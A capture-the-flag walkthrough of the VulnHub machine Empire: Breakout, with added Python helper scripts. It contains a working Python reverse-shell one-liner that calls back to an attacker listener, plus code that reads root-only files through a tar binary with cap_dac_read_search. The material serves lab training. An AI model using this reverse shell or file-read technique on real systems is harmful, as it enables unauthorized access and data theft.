EMPIRE BREAKOUT: VulnHub CTF walkthrough
April 11, 2022, by LetsPen Test (Infosec Institute, part of Cengage Group)

In this article, we will solve a capture the flag (CTF) challenge ported to the VulnHub platform: Breakout by icex64, originally released on the HackMyVM platform (https://hackmyvm.eu/machines/machine.php?vm=Breakout) and published on VulnHub as EMPIRE: BREAKOUT (https://download.vulnhub.com/empire/02-Breakout.zip). We assume that the goal of the CTF is to gain root access to the target machine and read the root flag. As per the description, this is a beginner-friendly challenge: the difficulty level is given as easy, and there isn't any advanced exploitation or reverse engineering involved. Prerequisites are some knowledge of Linux commands and the ability to run basic pentesting tools. Please try to understand each step and take notes.

For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. Offensive Security has since acquired the platform, and it is a very good source for professionals working towards OSCP-level certifications. The machines are intentionally vulnerable; if you understand the risks, please download.

I used Oracle VirtualBox to run the downloaded machine and Kali Linux as the attacker machine. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

Step 1: Identify the target IP address

The first step is to find the IP address of the target machine on the lab network, for example with netdiscover or with arp-scan (another write-up of this machine used << sudo arp-scan 10.0.0.0/24 >> and found the target at 10.0.0.83). The IP address is also printed on the welcome screen of the virtual machine, so a scan is not strictly necessary. In our lab the target was 192.168.1.11. The target machine's IP address may be different in your case, as the network DHCP server assigns it.

Step 2: Port scan

The second step is to run a port scan to identify the open ports and services on the target machine. I prefer Nmap for port scanning, as it works effectively and is available on Kali Linux by default. Command used: << nmap 192.168.1.11 -p- -sV >>. By default, Nmap scans only the 1,000 most commonly used TCP ports; the -p- option scans all 65,535 ports, and -sV fingerprints the service listening on each open port. The scan identified port 80 (HTTP, Apache), the SMB ports 139 and 445, and two more HTTP ports, 10000 and 20000, both served by Webmin. Services on high ports like these are exactly what a partial scan misses, so it is important to conduct the full port scan during a pentest or when solving a CTF. There is no SSH port open, so any shell will have to come through the web services.

Step 3: Enumerate the web service on port 80

We opened the target machine's IP address in the browser and got the default Apache page. We then ran a web application enumeration scan, which brute-forces the target with a wordlist of default web application directory and file names. We used the Dirb tool, as it is installed on Kali Linux by default. Command used: << dirb http://192.168.1.11/ >>. The scan found a manual directory, which turned out to be the Apache documentation; nothing of interest there. However, a quick look at the source code of the default page revealed a comment containing a long string made up of nothing but the characters + - < > [ ] and a dot, which is a program in the brainfuck esoteric language. The identified string is given below for reference:

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.-.<++++++++++..>.++++.<<+.>-..++++++++++++++++++++.<.>>.<<++++++.++++++.

We searched on Google and found an online tool that interprets brainfuck: we copy-pasted the string as input, and the tool ran the program and printed its output, a short string that looks like a password. We kept it for later.

Step 4: Enumerate SMB

The port scan also showed the SMB protocol open, and enum4linux can pull user, share and policy information from it without credentials. Command used: << enum4linux -a 192.168.1.11 >>. The tool generates a large output; going through it, we noticed a valid local username, cyber. At this point we have a username and a candidate password.
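The walkthrough stresses running the full port scan rather than relying on Nmap's default port list. The following script is an added example, not code from the original article: it parses two Nmap grepable (-oG) outputs, reports the open ports that only the full scan found, and maps each open port to the enumeration step used above (web brute force for HTTP, enum4linux for SMB). The two scan outputs embedded in it are constructed samples mimicking a quick -F scan and a full -p- scan of 192.168.1.11; the service strings are illustrative and not copied from a real scan.

```python
"""Diff a partial Nmap scan against a full -p- scan and suggest next steps.

Added example for this walkthrough. Generate real inputs with:
  nmap -sV -F  -oG partial.gnmap 192.168.1.11
  nmap -sV -p- -oG full.gnmap    192.168.1.11
"""
from __future__ import annotations

import re

# Constructed sample outputs (tabs separate the fields in real -oG files).
PARTIAL_GNMAP = """\
# Nmap scan initiated as: nmap -sV -F -oG partial.gnmap 192.168.1.11
Host: 192.168.1.11 ()\tStatus: Up
Host: 192.168.1.11 ()\tPorts: 80/open/tcp//http//Apache httpd/, 139/open/tcp//netbios-ssn//Samba smbd/, 445/open/tcp//netbios-ssn//Samba smbd/, 10000/open/tcp//http//MiniServ (Webmin httpd)/\tIgnored State: closed (96)
# Nmap done
"""

FULL_GNMAP = """\
# Nmap scan initiated as: nmap -sV -p- -oG full.gnmap 192.168.1.11
Host: 192.168.1.11 ()\tStatus: Up
Host: 192.168.1.11 ()\tPorts: 80/open/tcp//http//Apache httpd/, 139/open/tcp//netbios-ssn//Samba smbd/, 445/open/tcp//netbios-ssn//Samba smbd/, 10000/open/tcp//http//MiniServ (Webmin httpd)/, 20000/open/tcp//http//MiniServ (Webmin httpd)/\tIgnored State: closed (65530)
# Nmap done
"""

# One -oG port entry: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")

NEXT_STEP_HINT = {
    "web": "browse it, read the page source, brute-force directories (dirb)",
    "smb": "enumerate users and shares (enum4linux -a)",
    "ssh": "try found credentials, check for weak keys",
    "other": "look up the fingerprinted service and version",
}


def parse_open_ports(gnmap: str) -> dict[int, tuple[str, str]]:
    """Return {port: (service, version)} for every open TCP port."""
    found: dict[int, tuple[str, str]] = {}
    for line in gnmap.splitlines():
        if "Ports:" not in line:
            continue
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        # Split on the comma that precedes the next "port/" entry, so commas
        # inside a version string do not break the parse.
        for entry in re.split(r",\s*(?=\d+/)", ports_field):
            m = PORT_RE.search(entry.strip())
            if m and m.group(2) == "open" and m.group(3) == "tcp":
                found[int(m.group(1))] = (m.group(4), m.group(5))
    return found


def missed_by_partial(partial_gnmap: str, full_gnmap: str) -> list[int]:
    """Open ports present in the full scan but absent from the partial one."""
    missed = set(parse_open_ports(full_gnmap)) - set(parse_open_ports(partial_gnmap))
    return sorted(missed)


def next_steps(gnmap: str) -> dict[int, str]:
    """Classify each open port into the enumeration step it calls for."""
    steps: dict[int, str] = {}
    for port, (service, version) in parse_open_ports(gnmap).items():
        if service.startswith("http") or "http" in version.lower():
            steps[port] = "web"
        elif service in ("netbios-ssn", "microsoft-ds"):
            steps[port] = "smb"
        elif service == "ssh":
            steps[port] = "ssh"
        else:
            steps[port] = "other"
    return steps


if __name__ == "__main__":
    for port in missed_by_partial(PARTIAL_GNMAP, FULL_GNMAP):
        print(f"port {port} was only found by the full scan")
    for port, kind in next_steps(FULL_GNMAP).items():
        print(f"{port:>5}/tcp {kind:<5} -> {NEXT_STEP_HINT[kind]}")
```

With the constructed inputs, the script reports that port 20000 only shows up in the full scan and tags 80, 10000 and 20000 as web targets and 139/445 as SMB targets, which is the order of enumeration followed in this walkthrough.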
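The walkthrough decoded the brainfuck string with an online tool. Because the output is almost certainly a credential, it is better to decode it locally. The interpreter below is an added example, not code from the original article. It runs a brainfuck program with 8-bit wrapping cells and a tape that grows on demand, which is how the common online decoders behave, and includes a small check for "is this string brainfuck at all". The HI_PROGRAM is a constructed test program; PAGE_STRING is the string as reproduced in this article, and because a copied string can lose or gain characters in transit, the decoded value is printed rather than asserted, so take the string from the actual page source of the target.

```python
"""Offline brainfuck decoder for strings found in page source.

Added example for this walkthrough; decode locally instead of pasting a
probable password into a third-party website.
"""
from __future__ import annotations

BF_INSTRUCTIONS = set("+-<>[].,")


def brainfuck(program: str, cell_size: int = 256) -> str:
    """Run `program` with no input and return everything it printed.

    Cells are unsigned 8-bit (wrap modulo 256); the tape grows to the right
    as needed; moving left of cell 0 is an error rather than silently ignored.
    """
    code = [c for c in program if c in BF_INSTRUCTIONS]

    # Pre-compute matching bracket positions so loop jumps are O(1).
    jump: dict[int, int] = {}
    stack: list[int] = []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")

    tape, ptr, pc, out = [0], 0, 0, []
    while pc < len(code):
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) % cell_size
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % cell_size
        elif c == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif c == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved left of cell 0")
            ptr -= 1
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0  # no stdin available: treat input as EOF (0)
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


def looks_like_brainfuck(text: str) -> bool:
    """Heuristic for a suspicious comment: reasonably long and made only of
    the eight brainfuck instructions (whitespace ignored)."""
    stripped = "".join(text.split())
    return len(stripped) >= 32 and set(stripped) <= BF_INSTRUCTIONS


# Constructed test program: cell1 = 8*9 = 72 ('H'), cell3 = 11*10 - 5 = 105 ('i').
HI_PROGRAM = "++++++++[>+++++++++<-]>.>+++++++++++[>++++++++++<-]>-----."

# The string as reproduced in this article (verify against the real page source).
PAGE_STRING = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.-.<++++++++++..>.++++.<<+.>-..++++++++++++++++++++.<.>>.<<++++++.++++++."

if __name__ == "__main__":
    print(brainfuck(HI_PROGRAM))
    if looks_like_brainfuck(PAGE_STRING):
        print("decoded:", brainfuck(PAGE_STRING))
```

The bracket pre-pass is what makes the decoder safe to point at untrusted input: an unbalanced program is rejected up front instead of looping forever, and the left-of-tape check catches the other way a hostile string could misbehave.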
Step 5: Log in to Webmin and get a shell

Using the username cyber and the password decoded from the brainfuck string, I could log into the Webmin service running on port 20000; the login was successful, so the credentials were correct. Webmin offers a command shell, and we first used it to run some commands to identify the operating system and kernel version. We searched the web for an available exploit for these versions, but none could be found, so we continued through the web console. To work from a proper terminal, we configured the netcat tool on our attacker machine (192.168.1.23) to receive incoming connections on port 1234 and executed a Python reverse shell on the target through the Webmin command shell. Command used: << python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.23",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' >>. The one-liner connects back to the listener and duplicates the socket onto stdin, stdout and stderr before spawning a shell in a pseudo-terminal, so the listener receives an interactive shell. BOOM! The output of the id command confirms that we have terminal access as user cyber, and that we are not the root user, so we still need to escalate.

Step 6: Privilege escalation through a capability on tar

Post-exploitation, always enumerate the directories of the logged-in user to find interesting files and information. In cyber's home directory there is a copy of the tar binary, which is unusual. Checking its file capabilities shows cap_dac_read_search set on it (highlighted in green in the output). CAP_DAC_READ_SEARCH lets a process bypass file read permission checks and directory read and search permission checks, which means this tar can archive any file on the system, including files that only root can read; it does not by itself grant write access or a root shell. Rather than checking binaries one by one, you can search the whole filesystem recursively for binaries that carry capabilities.

We used the capable tar to archive a file the cyber user could not otherwise read, extracted the archive, and found a password inside. Lastly, I switched to root with that password and was dropped into a root shell.

Step 7: Read the root flag

We have completed the exploitation part of the CTF; the final step is to read the root flag, which was found in the root directory. This completes the challenge!

I hope you liked the walkthrough. We will continue this series with other VulnHub machines as well. Until then, I encourage you to try to finish this CTF yourself.
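Two things in the privilege escalation step are worth automating: triaging the output of a recursive capability search, and the tar trick itself. The script below is an added example, not code from the original article. The getcap output it parses is a constructed sample covering both output formats that getcap produces (newer libcap prints "path cap=flags", older versions "path = cap+flags"); on a target you would feed it the output of `getcap -r / 2>/dev/null`. The path /home/cyber/tar is an assumption based on the walkthrough's description of a tar copy in the cyber user's home directory, and the file read in the demonstration is a constructed temporary file, so the round trip works on any machine; against the target you would point tar_bin at the capable binary and target at a root-only file.

```python
"""Triage file capabilities and read a protected file through a capable tar.

Added example for this walkthrough. Real input: getcap -r / 2>/dev/null
"""
from __future__ import annotations

import io
import os
import re
import shutil
import subprocess
import tarfile
import tempfile

# Capabilities that let an unprivileged user read or modify what it should not.
DANGEROUS_CAPS = {
    "cap_dac_read_search": "bypasses read/search permission checks: can read any file",
    "cap_dac_override": "bypasses all DAC checks: can read and write any file",
    "cap_setuid": "can change its UID, for example to 0",
    "cap_sys_admin": "broad administrative rights, effectively root",
}

# Constructed sample in both getcap output styles. /home/cyber/tar is assumed.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/home/cyber/tar cap_dac_read_search=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

GETCAP_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>[a-z_,]+)[=+](?P<flags>[a-z]+)$")

SECRET = b"constructed sample: on the target this would be a root-only file\n"


def parse_getcap(output: str) -> dict[str, tuple[list[str], str]]:
    """Map each file to (capability names, flag letters such as 'ep')."""
    result: dict[str, tuple[list[str], str]] = {}
    for line in output.splitlines():
        m = GETCAP_RE.match(line.strip())
        if m:
            result[m.group("path")] = (m.group("caps").split(","), m.group("flags"))
    return result


def triage(caps_by_file: dict[str, tuple[list[str], str]]) -> list[tuple[str, str, str]]:
    """Return (path, capability, why it matters) for dangerous effective caps.

    A capability-unaware binary like tar only benefits if the 'e' (effective)
    flag is set; permitted-only caps would need the program to raise them.
    """
    hits = []
    for path, (caps, flags) in caps_by_file.items():
        if "e" not in flags:
            continue
        for cap in caps:
            if cap in DANGEROUS_CAPS:
                hits.append((path, cap, DANGEROUS_CAPS[cap]))
    return hits


def read_with_tar(tar_bin: str, target: str) -> bytes:
    """Archive `target` with tar_bin to stdout and pull the file back out.

    Only the archiving step touches the protected file, so a tar that carries
    cap_dac_read_search=ep can read files the current user cannot open.
    """
    proc = subprocess.run([tar_bin, "-cf", "-", target], check=True,
                          capture_output=True)  # stderr: "Removing leading '/'"
    with tarfile.open(fileobj=io.BytesIO(proc.stdout), mode="r:") as tf:
        for member in tf.getmembers():
            if member.isfile():
                return tf.extractfile(member).read()
    raise FileNotFoundError(f"{target} not found in archive")


def demo_read(tar_bin: str | None = None) -> bytes:
    """Round-trip a constructed file through read_with_tar (system tar by default)."""
    tar_bin = tar_bin or shutil.which("tar")
    if tar_bin is None:
        raise RuntimeError("no tar binary found")
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "protected.txt")  # hypothetical file name
        with open(path, "wb") as fh:
            fh.write(SECRET)
        return read_with_tar(tar_bin, path)


if __name__ == "__main__":
    for path, cap, why in triage(parse_getcap(SAMPLE_GETCAP)):
        print(f"{path}: {cap} ({why})")
    print(demo_read().decode())
```

Two practical notes: the 'e' check matters because getcap lists the permitted set too, and a cap that is permitted but not effective does nothing for a program that never calls capset; and reading through tar leaves a clean audit trail (the archive itself), which is why the defensive fix is simply to remove the capability from a binary that has no business carrying it.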